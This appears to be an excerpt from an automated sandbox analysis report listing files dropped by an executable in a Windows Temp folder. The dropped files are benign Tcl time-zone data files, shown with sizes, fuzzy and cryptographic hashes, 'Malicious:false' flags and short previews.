                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Merida) {. {-9223372036854775808 -21508 0 LMT}. {-1514743200 -21600 0 CST}. {377935200 -18000 0 EST}. {407653200 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 CDT}. {1225004400 -21600 0 CST}. {1238918400 -18000 1 CD
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6462
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.906655458013535
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:XP19jJ+h5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:X99jIh5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                                                                                                MD5:897140EE4C46A300FBA4B66692A77D2B
                                                                                                                                                                                                                                                                                                                                SHA1:D5F2F3C8561A19EA0C5DAF0236696D5DB98D4220
                                                                                                                                                                                                                                                                                                                                SHA-256:8B48C28A0AB6728CEDBCC82197355A5F9DD7D73E270EE949D996BB788777623B
                                                                                                                                                                                                                                                                                                                                SHA-512:17E52B3C00C4EDE3B2FA10A4BE0601889B12581D31936D075E85118F37329716C4083D2B16F7081F7AA73EC9774ED7B4CF67615BE6090F8A506BF77AADE0CAFD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Metlakatla) {. {-9223372036854775808 54822 0 LMT}. {-3225223727 -31578 0 LMT}. {-2188955622 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6807
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.761365047166545
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:VeE7nN41+zKstuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sQ:VeE7nN41+zKstuNEsRZjWqZL/1dCYDDK
                                                                                                                                                                                                                                                                                                                                MD5:C675DA8A44A9841C417C585C2661EF13
                                                                                                                                                                                                                                                                                                                                SHA1:147DDE5DD00E520DA889AC9931088E6232CE6FEA
                                                                                                                                                                                                                                                                                                                                SHA-256:82B9AAD03408A9DFC0B6361EC923FEAEF97DBB4B3129B772B902B9DAE345D63E
                                                                                                                                                                                                                                                                                                                                SHA-512:00615A5EC0D08BABF009C3CAAF3D631B1F4E2E4324E91B0F29ADD7E61B51C80D5D495D20BD131A9370C3005B2E510C8A4E4869A5032D82BC33C875E909CDE086
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Mexico_City) {. {-9223372036854775808 -23796 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-975261600 -18000 1 CDT}. {-963169200 -21600 0 CST}. {-917114400 -18000 1 CDT}. {-907354800 -21600 0 CST}. {-821901600 -18000 1 CWT}. {-810068400 -21600 0 CST}. {-627501600 -18000 1 CDT}. {-612990000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001836800 -21600 0 CST}. {1014184800 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6846
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.44227328239419
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:FxfUaXYEn/wGm3eADKja4PcCYCJ7j7Ub0ZixJpF8pnmpRipo1kay2DfhJ+Nwz/ad:DeTntbDs
                                                                                                                                                                                                                                                                                                                                MD5:0C7122725D98CDE5CB9B22624D24A26C
                                                                                                                                                                                                                                                                                                                                SHA1:1889279EBE1377DB3460B706CAA4ECF803651517
                                                                                                                                                                                                                                                                                                                                SHA-256:86BB088047FB5A6041C7B0792D15F9CB453F49A54F78529CC415B7FF2C41265A
                                                                                                                                                                                                                                                                                                                                SHA-512:C23D3AE8D579FAC56521A0C06178550C4976E906A4CD149554821A2550B0EAB43344C6536166271EAA22EC77AF8529D9164696D7A5A740B02FA34C4272D43F26
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Miquelon) {. {-9223372036854775808 -13480 0 LMT}. {-1850328920 -14400 0 AST}. {326001600 -10800 0 -03}. {536468400 -10800 0 -02}. {544597200 -7200 1 -02}. {562132800 -10800 0 -02}. {576046800 -7200 1 -02}. {594187200 -10800 0 -02}. {607496400 -7200 1 -02}. {625636800 -10800 0 -02}. {638946000 -7200 1 -02}. {657086400 -10800 0 -02}. {671000400 -7200 1 -02}. {688536000 -10800 0 -02}. {702450000 -7200 1 -02}. {719985600 -10800 0 -02}. {733899600 -7200 1 -02}. {752040000 -10800 0 -02}. {765349200 -7200 1 -02}. {783489600 -10800 0 -02}. {796798800 -7200 1 -02}. {814939200 -10800 0 -02}. {828853200 -7200 1 -02}. {846388800 -10800 0 -02}. {860302800 -7200 1 -02}. {877838400 -10800 0 -02}. {891752400 -7200 1 -02}. {909288000 -10800 0 -02}. {923202000 -7200 1 -02}. {941342400 -10800 0 -02}. {954651600 -7200 1 -02}. {972792000 -10800 0 -
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10165
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.73501024949866
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:XYtQYUKXZRMavqQS8L2En/RDmzTWRf2oFnoF8l988fL8vG+81VcfnrpbX+qvlrPf:gQYzCO4alKqYvuOdeYP/Jv
                                                                                                                                                                                                                                                                                                                                MD5:C1F34BD1FB4402481FFA5ABEE1573085
                                                                                                                                                                                                                                                                                                                                SHA1:46B9AD38086417554549C36A40487140256BED57
                                                                                                                                                                                                                                                                                                                                SHA-256:A4C2F586D7F59A192D6D326AD892C8BE20753FB4D315D506F4C2ED9E3F657B9A
                                                                                                                                                                                                                                                                                                                                SHA-512:115D3E65A6A3834E748ED1917CF03A835F74EC0F8DB789C2B99EB78879EA3A5A2AFEB35981BA221D868E6A5B579374CFB3F865ACF6D4271B918EBCC2C3C69579
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Moncton) {. {-9223372036854775808 -15548 0 LMT}. {-2715882052 -18000 0 EST}. {-2131642800 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-1167595200 -14400 0 AST}. {-1153681200 -10800 1 ADT}. {-1145822400 -14400 0 AST}. {-1122231600 -10800 1 ADT}. {-1114372800 -14400 0 AST}. {-1090782000 -10800 1 ADT}. {-1082923200 -14400 0 AST}. {-1059332400 -10800 1 ADT}. {-1051473600 -14400 0 AST}. {-1027882800 -10800 1 ADT}. {-1020024000 -14400 0 AST}. {-996433200 -10800 1 ADT}. {-988574400 -14400 0 AST}. {-965674800 -10800 1 ADT}. {-955396800 -14400 0 AST}. {-934743600 -10800 1 ADT}. {-923947200 -14400 0 AST}. {-904503600 -10800 1 ADT}. {-891892800 -14400 0 AST}. {-883598400 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-757368000 -14400 0 AST}. {-747252000 -10800 1 ADT}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6496
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.75909042772931
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:Xc+vN41+z6stuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOt:saN41+z6stuNEsRZjWqZL/1dCYDDCxyI
                                                                                                                                                                                                                                                                                                                                MD5:255A5A8E27CA1F0127D71E09033C6D9B
                                                                                                                                                                                                                                                                                                                                SHA1:4F1C5E6D3F9E5BC9F8958FA50C195FDADD0F4022
                                                                                                                                                                                                                                                                                                                                SHA-256:C753DEF7056E26D882DCD842729816890D42B6C7E31522111467C0C39A24B2F2
                                                                                                                                                                                                                                                                                                                                SHA-512:96A67C3CC54EC39086D4DF681DDA39B4167FE80F0C45600045480F28C282071915F793BD672146119A22E0C15339F162DFF9DF326E7132E723684EF079666F58
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Monterrey) {. {-9223372036854775808 -24076 0 LMT}. {-1514743200 -21600 0 CST}. {568015200 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {599637600 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 C
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2840
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.549378422404712
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5JJjQSSSGEcS2SrPZSMSEkS/StSneSOSnx7EXnF9XXGGLgvA/Sa8h1liqZovoJqP:X9QV0cduTSe+J1ix7inFBXGGUvA/Sa8A
                                                                                                                                                                                                                                                                                                                                MD5:87A9F18CE5E5EE97D943316EE93DC664
                                                                                                                                                                                                                                                                                                                                SHA1:C221C82FA644943AF05C5737B4A68418BEFE66D7
                                                                                                                                                                                                                                                                                                                                SHA-256:E8DB201FDAF1FD43BE39422062CEB2A25F25764934C481A95CD7BB3F93949495
                                                                                                                                                                                                                                                                                                                                SHA-512:AC7D6BA85A37585BEC2101AAF0F46B04BF49F56B449A2BEC4E32D009576CA4D0CB687981EFA96DA8DAB00453F0020925E5FB9681BF8071AC6EFFC4F938E0D891
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Montevideo) {. {-9223372036854775808 -13491 0 LMT}. {-1942690509 -13491 0 MMT}. {-1567455309 -14400 0 -04}. {-1459627200 -10800 0 -0330}. {-1443819600 -12600 0 -0330}. {-1428006600 -10800 1 -0330}. {-1412283600 -12600 0 -0330}. {-1396470600 -10800 1 -0330}. {-1380747600 -12600 0 -0330}. {-1141590600 -10800 1 -0330}. {-1128286800 -12600 0 -0330}. {-1110141000 -10800 1 -0330}. {-1096837200 -12600 0 -0330}. {-1078691400 -10800 1 -0330}. {-1065387600 -12600 0 -0330}. {-1047241800 -10800 1 -0330}. {-1033938000 -12600 0 -0330}. {-1015187400 -10800 1 -0330}. {-1002488400 -12600 0 -0330}. {-983737800 -10800 1 -0330}. {-971038800 -12600 0 -0330}. {-954707400 -10800 1 -0330}. {-938984400 -12600 0 -0330}. {-920838600 -10800 1 -0330}. {-907534800 -12600 0 -0330}. {-896819400 -10800 1 -0330}. {-853621200 -9000 0 -03}. {-845847000 -10800 0 -03}. {-33
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.696915330047381
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0qMKLRXIVAIg20qMKLRI62IAcGEzQ21h4IAcGEqMKR:SlSWB9IZaM3y7RQ+VAIgpRQ+6290zQg2
                                                                                                                                                                                                                                                                                                                                MD5:F4631583229AD8B12C548E624AAF4A9F
                                                                                                                                                                                                                                                                                                                                SHA1:C56022CEACBD910C9CBF8C39C974021294AEE9DA
                                                                                                                                                                                                                                                                                                                                SHA-256:884575BE85D1276A1AE3426F33153B3D4787AC5238FDBE0991C6608E7EB0DF07
                                                                                                                                                                                                                                                                                                                                SHA-512:48FB9910D8A75AD9451C860716746D38B29319CA04DF9E8690D62FB875A5BEBCC7A8C546A60878821BD68A83271C69671D483C3133E4F807F2C3AC899CEBF065
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Toronto)]} {. LoadTimeZoneFile America/Toronto.}.set TZData(:America/Montreal) $TZData(:America/Toronto).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):205
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.865859395466201
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290zQ1HK90e/:MBaIMY9QpI290zQ490O
                                                                                                                                                                                                                                                                                                                                MD5:705E51A8FB38AA8F9714256AFB55DA8A
                                                                                                                                                                                                                                                                                                                                SHA1:97D96BE4C08F128E739D541A43057F08D24DDDCF
                                                                                                                                                                                                                                                                                                                                SHA-256:0FED15D7D58E8A732110FF6765D0D148D15ACBB0251EE867CE7596933E999865
                                                                                                                                                                                                                                                                                                                                SHA-512:4D7E42ECDB16F7A8A62D9EDA1E365325F3CBFAA1EF0E9FEE2790E24BA8DEAAA716D41F9389B849C69DC3973DA61D575146932FB2C8AC81579C65C18E45AE386E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Montserrat) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8260
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7353311910027376
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:JUzoaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:Gzorn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:6F9F530A792FC34E2B0CEE4BC3DB3809
                                                                                                                                                                                                                                                                                                                                SHA1:4DF8A4A6993E47DD5A710BEE921D88FEF44858E7
                                                                                                                                                                                                                                                                                                                                SHA-256:9F62117DDA0A21D37B63C9083B3C50572399B22D640262F427D68123078B32F9
                                                                                                                                                                                                                                                                                                                                SHA-512:C2BF93FDBE8430113FA63561D1A08145DCF31CD679AB7230098993C7A19EF0F29F486C962656F8A62505CB1BFE993FBD3BB5FB0BAE7B6E7E190DE2865C445408
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nassau) {. {-9223372036854775808 -18570 0 LMT}. {-1825095030 -18000 0 EST}. {-179341200 -14400 1 EDT}. {-163620000 -18000 0 EST}. {-147891600 -14400 1 EDT}. {-131565600 -18000 0 EST}. {-116442000 -14400 1 EDT}. {-100116000 -18000 0 EST}. {-84387600 -14400 1 EDT}. {-68666400 -18000 0 EST}. {-52938000 -14400 1 EDT}. {-37216800 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {104914800 -14400 1 EDT}. {120636000 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {189320400 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11004
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.725417189649631
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:iNXYUiZrbgZ8UMr5UwdaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:23iZrbgZ8UMr2wdrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:C9D78AB6CF796A9D504BE2903F00B49C
                                                                                                                                                                                                                                                                                                                                SHA1:A6C0E4135986A1A6F36B62276BFAB396DA1A4A9B
                                                                                                                                                                                                                                                                                                                                SHA-256:1AB6E47D96BC34F57D56B936233F58B5C748B65E06AFF6449C3E3C317E411EFE
                                                                                                                                                                                                                                                                                                                                SHA-512:6D20B13F337734CB58198396477B7C0E9CB89ED4D7AB328C22A4A528CAF187D10F42540DBB4514A0C139E6F4AE9A1A71AED02E3735D1D4F12C5314014C0C1EB6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/New_York) {. {-9223372036854775808 -17762 0 LMT}. {-2717650800 -18000 0 EST}. {-1633280400 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1601830800 -14400 1 EDT}. {-1583690400 -18000 0 EST}. {-1577905200 -18000 0 EST}. {-1570381200 -14400 1 EDT}. {-1551636000 -18000 0 EST}. {-1536512400 -14400 1 EDT}. {-1523210400 -18000 0 EST}. {-1504458000 -14400 1 EDT}. {-1491760800 -18000 0 EST}. {-1473008400 -14400 1 EDT}. {-1459706400 -18000 0 EST}. {-1441558800 -14400 1 EDT}. {-1428256800 -18000 0 EST}. {-1410109200 -14400 1 EDT}. {-1396807200 -18000 0 EST}. {-1378659600 -14400 1 EDT}. {-1365357600 -18000 0 EST}. {-1347210000 -14400 1 EDT}. {-1333908000 -18000 0 EST}. {-1315155600 -14400 1 EDT}. {-1301853600 -18000 0 EST}. {-1283706000 -14400 1 EDT}. {-1270404000 -18000 0 EST}. {-1252256400 -14400 1 EDT}. {-1238954400 -18000 0 EST}. {-122080680
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7836
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7462966187089535
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:rEa2raC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:rYrrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:3D389AA51D3E29E8A1E8ED07646AA0DD
                                                                                                                                                                                                                                                                                                                                SHA1:2E3DF9406B14662ADEDDC0F891CD81DF23D98157
                                                                                                                                                                                                                                                                                                                                SHA-256:3A0FB897E5CCB31B139E009B909053DCE36BB5791ACF23529D874AFA9F0BB405
                                                                                                                                                                                                                                                                                                                                SHA-512:AFF7B30355ECB6EBD43D1E6C943C250AB98CC82BDC8DDC7595769E4CE188A23591AEFCF18A028CC6479CF6AA20F65980E37C74F6CEE907537366136FAF29B66E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nipigon) {. {-9223372036854775808 -21184 0 LMT}. {-2366734016 -18000 0 EST}. {-1632070800 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-923252400 -14400 1 EDT}. {-880218000 -14400 0 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8404
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.88589736733708
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:OWmWQm825s/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:OWmWQmI/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                                                                                                MD5:F5E89780553D3D30A32CF65746CA9A69
                                                                                                                                                                                                                                                                                                                                SHA1:43D8B6E3C5D719599A680E1E6D4FF913D2700D7E
                                                                                                                                                                                                                                                                                                                                SHA-256:5BDA4867EC7707E9D5E07AD3E558DA7C1E44EC1135E85A8F1809441A54B22BE5
                                                                                                                                                                                                                                                                                                                                SHA-512:D1239FF5277055DD8787BF58ED14DBDC229FC46EDDF21E034CA77DEA439631974F44FCE63EF12483520ADB83AD235642AE480230544A7284A8BDAA5296486563
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nome) {. {-9223372036854775808 46702 0 LMT}. {-3225223727 -39698 0 LMT}. {-2188947502 -39600 0 NST}. {-883573200 -39600 0 NST}. {-880196400 -36000 1 NWT}. {-769395600 -36000 1 NPT}. {-765374400 -39600 0 NST}. {-757342800 -39600 0 NST}. {-86878800 -39600 0 BST}. {-31496400 -39600 0 BST}. {-21466800 -36000 1 BDT}. {-5745600 -39600 0 BST}. {9982800 -36000 1 BDT}. {25704000 -39600 0 BST}. {41432400 -36000 1 BDT}. {57758400 -39600 0 BST}. {73486800 -36000 1 BDT}. {89208000 -39600 0 BST}. {104936400 -36000 1 BDT}. {120657600 -39600 0 BST}. {126709200 -36000 1 BDT}. {152107200 -39600 0 BST}. {162392400 -36000 1 BDT}. {183556800 -39600 0 BST}. {199285200 -36000 1 BDT}. {215611200 -39600 0 BST}. {230734800 -36000 1 BDT}. {247060800 -39600 0 BST}. {262789200 -36000 1 BDT}. {278510400 -39600 0 BST}. {294238800 -36000 1 BDT}. {309960000 -3
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1349
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6915980783248976
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQ8eHNxrW3YrEnBrur9rTPBrJ2r+KrDv1rn1rHhr33rPxN4brSJrrh4rEgtXrH1W:5PxrW3YrEnBruxrT5rJ2r+KrDv1rn1r/
                                                                                                                                                                                                                                                                                                                                MD5:10B0C457561BA600E9A39CE20CD22B72
                                                                                                                                                                                                                                                                                                                                SHA1:07946FBB04D0C8D7CA92204E3E2DF3AB755196AB
                                                                                                                                                                                                                                                                                                                                SHA-256:96AEE3A529C11C8DBDE3431C65C8C2315DBCFB5686957419EFCEB3D49208AB11
                                                                                                                                                                                                                                                                                                                                SHA-512:A60AFB3DD064EAB9C4AE5F0A112DA5A7903BDB99DCF78BB99FE13DBB72310E8D47A2A62A58DAD2AB4F33971001F5B9787D663649E05FBD47B75994113CD5E8ED
                                                                                                                                                                                                                                                                                                                                Malicious:false
